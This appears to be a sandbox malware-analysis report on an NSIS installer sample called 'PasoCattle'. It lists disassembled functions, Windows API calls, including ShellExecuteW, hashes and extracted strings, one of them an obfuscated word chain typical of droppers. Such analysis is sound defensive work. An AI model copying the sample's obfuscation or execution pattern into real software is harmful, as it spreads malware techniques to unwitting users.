                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                      • String ID: ... %d%%$Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-$pAB
                                                                                                                                                                      • API String ID: 651206458-1427982325
                                                                                                                                                                      • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                      • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                      • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                      • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                      • lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                      • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                      • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2740478559-0
                                                                                                                                                                      • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                      • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                      • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                      • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                      • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeGloballstrcpyn
                                                                                                                                                                      • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                      • API String ID: 1459762280-1711415406
                                                                                                                                                                      • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                      • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                      • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                      • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                      • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                      • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3376005127-0
                                                                                                                                                                      • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                      • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                      • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2568930968-0
                                                                                                                                                                      • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                      • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                      • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                      • API String ID: 247603264-1827671502
                                                                                                                                                                      • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                      • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                      • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                      • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                      Strings
                                                                                                                                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                      • API String ID: 3156913733-2180253247
                                                                                                                                                                      • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                      • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                      • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                      • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                      • String ID: nsa
                                                                                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                                                                                      • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                      • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                      • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                      • String ID: HideWindow
                                                                                                                                                                      • API String ID: 1249568736-780306582
                                                                                                                                                                      • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                      • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                      • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                      APIs
                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                      • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                      • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                      • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
